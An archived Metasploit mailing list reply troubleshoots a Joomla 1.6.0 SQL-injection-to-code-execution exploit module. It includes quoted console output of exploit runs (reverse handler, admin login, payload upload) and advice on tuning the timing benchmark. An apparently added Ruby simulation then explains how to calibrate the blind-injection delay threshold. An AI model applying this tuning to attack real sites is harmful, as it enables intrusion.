Metasploit mailing list archives
Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE)
From: GulfTech Security Research <security () gulftech org>
Date: Fri, 3 Jun 2011 17:30:59 -0400
The proper BMCT value will differ greatly from platform to platform, since server performance directly affects the delay. The only advice I would give is start low and go high so as not to choke the mysql daemon.

In regards to the admin exec bit, it is really hard to tell from your email as there is no "show options" output etc. given. But, if you set the DBUG option, the http response will be "pp"ed to the console, and should give you the tools you need to self diagnose the problem.

Good luck!

~James

On Fri, Jun 3, 2011 at 4:39 PM, Jeffs <jeffs () speakeasy net> wrote:

> Hello All,
>
> Anybody get joomla_filter_order and/or joomla_16_admin_exec to work? I've launched it against a vulnerable 1.6 install of Joomla and get the following (even tried varying BMCT and BMCR as instructed):
>
> msf exploit(joomla_filter_order) > exploit
> [*] Started reverse handler on 192.168.1.108:4444
> [*] Initializing exploit code ...
> ################################################
> # Joomla! 1.6.0 SQL Injection -> PHP execution #
> ################################################
> # By James Bercegay                            #
> # http://www.gulftech.org/                     #
> ################################################
> [*] Attempting to determine Joomla version
> [*] The target is running Joomla version : 1.6
> [*] Host appears vulnerable!
> [*] Got database table prefix : jos_
> [*] Calculating target response times
> [*] Benchmarking 1 normal requests
> [*] Normal request avg: 0 seconds
> [*] Benchmarking 1 delayed requests
> [*] Delayed request avg: 1 seconds
> [-] Either your benchmark threshold is too small, or host is not vulnerable
> [-] To increase the benchmark threshold adjust the value of the BMDF option
> [-] To increase the expression iterator adjust the value of the BMCT option
> [*] Exploit completed, but no session was created.
> msf exploit(joomla_filter_order) >
>
> msf exploit(joomla_16_admin_exec) > rexploit
> [*] Reloading module...
> [*] Started reverse handler on 192.168.1.108:4444
> [*] Attempting to extract a valid request token
> [*] Got token: 5546d400d2ac74f8bcc6f23ea1eec261
> [*] Got Cookie: 114a3fcff61e5bebf5463b377d1563a3 => e146646fc1c90611ba2117118785823c
> [*] Attempting to login as: admin
> [*] Successfully logged in as: admin
> [*] Attempting to extract refreshed request token
> [*] Got token: 44e14542b6a247c4281e7004dff16397
> [*] Attempting to upload payload wrapper component
> [*] Exploit completed, but no session was created.
> msf exploit(joomla_16_admin_exec) >
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
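The benchmark step the console output above reports (a normal-request average and a delayed-request average, compared against the BMDF threshold, with BMCT scaling the delay) can be illustrated with the following added Ruby simulation. It is not the Metasploit module's code and contains no network or database logic: the latency model, the names `constructed_latency_model`, `BenchmarkCalibrator` and `single_sample_whole_seconds`, and the `bmdf`/`bmct` parameters are constructed for illustration. It shows why one sample per side, reported in whole seconds, is too coarse to separate a "0 seconds" from a "1 seconds" average reliably, and how James's "start low and go high" advice becomes a doubling ramp that stops at the smallest iterator value that clears the threshold.

```ruby
# Added example (not from the Metasploit module): a simulation of the
# benchmark/threshold decision reported in the console output above.

# Constructed latency model: a lambda returning simulated seconds for one
# request. `bmct` is the iterator count of the delayed expression and
# `delayed` selects whether that expression ran at all. Base latency,
# jitter and per-iteration cost are invented values.
def constructed_latency_model(seed: 42, base: 0.2, jitter: 0.1, cost_per_iter: 5.0e-7)
  rng = Random.new(seed)
  lambda do |bmct, delayed|
    t = base + rng.rand(jitter)
    t += bmct * cost_per_iter if delayed
    t
  end
end

class BenchmarkCalibrator
  # bmdf:   minimum gap in seconds between delayed and normal averages
  # rounds: samples averaged per side (1 reproduces the output above)
  def initialize(model, bmdf: 1.0, rounds: 3)
    @model = model
    @bmdf = bmdf
    @rounds = rounds
  end

  # Average response time over `rounds` samples, kept as a float rather
  # than rounded to whole seconds.
  def average(bmct, delayed)
    times = Array.new(@rounds) { @model.call(bmct, delayed) }
    times.sum / times.size
  end

  # The decision itself: is the delayed average at least bmdf seconds
  # slower than the normal one?
  def distinguishable?(bmct)
    average(bmct, true) - average(bmct, false) >= @bmdf
  end

  # "Start low and go high": double bmct until the delay clears the
  # threshold. Returns nil if the cap is reached without a clear decision,
  # which is the "threshold too small, or not vulnerable" case.
  def calibrate(start: 100_000, cap: 100_000_000)
    bmct = start
    while bmct <= cap
      return bmct if distinguishable?(bmct)
      bmct *= 2
    end
    nil
  end
end

# One sample per side, rounded to whole seconds as in the output above.
# With this model a gap of about 0.8 s reads as "0 vs 1", which is exactly
# what a 1-second BMDF cannot accept. Returns [normal, delayed].
def single_sample_whole_seconds(model, bmct)
  [model.call(bmct, false).round, model.call(bmct, true).round]
end

if __FILE__ == $PROGRAM_NAME
  model = constructed_latency_model
  cal = BenchmarkCalibrator.new(model, bmdf: 1.0, rounds: 3)
  puts "whole-second single sample at bmct=1_600_000: #{single_sample_whole_seconds(model, 1_600_000).inspect}"
  puts "smallest bmct clearing bmdf=1.0s: #{cal.calibrate}"
end
```

With these constructed numbers the ramp stops at 3,200,000 iterations: at 1,600,000 the delayed side averages roughly 1.0 to 1.1 seconds against a 0.2 to 0.3 second baseline, so the gap stays under the 1.0 second threshold even though whole-second rounding already prints "0 vs 1". Averaging several rounds as floats, and raising the iterator gradually rather than jumping to a large value, is what makes the decision stable without hammering the database server.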
Current thread:
- joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) YGN Ethical Hacker Group (May 28)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) Jeffs (May 29)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) HD Moore (May 29)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) GulfTech Security Research (May 31)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) YGN Ethical Hacker Group (Jun 02)
- joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) Jeffs (Jun 03)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) GulfTech Security Research (Jun 03)
- Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE) Jeffs (May 29)